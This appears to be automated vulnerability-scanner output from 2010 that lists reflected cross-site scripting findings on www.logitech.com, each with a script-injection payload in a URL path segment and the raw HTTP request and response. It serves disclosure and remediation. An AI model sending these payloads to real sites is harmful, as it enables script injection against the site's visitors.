HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e388f</script><script>alert(1)</script>2873378b32d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/1039e388f</script><script>alert(1)</script>2873378b32d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5285"%3bac7931b086f was submitted in the REST URL parameter 1. This input was echoed as f5285";ac7931b086f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usf5285"%3bac7931b086f/265/6687 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03e5"><script>alert(1)</script>389fde72b39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usc03e5"><script>alert(1)</script>389fde72b39/265/6687 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 385bf</script><script>alert(1)</script>b74a008f78e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /385bf</script><script>alert(1)</script>b74a008f78e/265/6687 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55b7"><script>alert(1)</script>93fd2d266e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/265b55b7"><script>alert(1)</script>93fd2d266e/6687 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5770a</script><script>alert(1)</script>b80bf584b5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/2655770a</script><script>alert(1)</script>b80bf584b5a/6687 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710e4"><script>alert(1)</script>ca1f2a5e2f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/265/6687710e4"><script>alert(1)</script>ca1f2a5e2f4 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86485</script><script>alert(1)</script>c38881d4550 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/265/668786485</script><script>alert(1)</script>c38881d4550 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61873"><script>alert(1)</script>23da25f57a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us61873"><script>alert(1)</script>23da25f57a2/349/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa93f</script><script>alert(1)</script>252076e8926 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aa93f</script><script>alert(1)</script>252076e8926/349/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec3a2"%3bc56b2682970 was submitted in the REST URL parameter 1. This input was echoed as ec3a2";c56b2682970 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usec3a2"%3bc56b2682970/349/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:01:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f30d"><script>alert(1)</script>b45076af784 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/3497f30d"><script>alert(1)</script>b45076af784/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a24a</script><script>alert(1)</script>f85fa4b58f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/3498a24a</script><script>alert(1)</script>f85fa4b58f7/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8518e</script><script>alert(1)</script>1319af95ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8518e</script><script>alert(1)</script>1319af95ca/349/6072 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd6c8"><script>alert(1)</script>50c8da53e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usfd6c8"><script>alert(1)</script>50c8da53e7/349/6072 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da40a"%3bf0266a417b6 was submitted in the REST URL parameter 1. This input was echoed as da40a";f0266a417b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usda40a"%3bf0266a417b6/349/6072 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39fb2"><script>alert(1)</script>423a22fa55a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/34939fb2"><script>alert(1)</script>423a22fa55a/6072 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d16f0</script><script>alert(1)</script>de4a040ad2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/349d16f0</script><script>alert(1)</script>de4a040ad2d/6072 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c067"><script>alert(1)</script>0ff74f39623 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/349/60723c067"><script>alert(1)</script>0ff74f39623 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bc63</script><script>alert(1)</script>b178cbb70e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/349/60723bc63</script><script>alert(1)</script>b178cbb70e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c707</script><script>alert(1)</script>33f9bdeee5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9c707</script><script>alert(1)</script>33f9bdeee5a/349/6775 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad825"><script>alert(1)</script>295434f427f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usad825"><script>alert(1)</script>295434f427f/349/6775 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 168dd"%3b2d6279d6b62 was submitted in the REST URL parameter 1. This input was echoed as 168dd";2d6279d6b62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us168dd"%3b2d6279d6b62/349/6775 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 606e9</script><script>alert(1)</script>815036778ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/349606e9</script><script>alert(1)</script>815036778ee/6775 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d057"><script>alert(1)</script>b8b89d6bd9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/3498d057"><script>alert(1)</script>b8b89d6bd9/6775 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e6e2</script><script>alert(1)</script>bb3b428b617 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/349/67757e6e2</script><script>alert(1)</script>bb3b428b617 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:55 GMT Connection: close
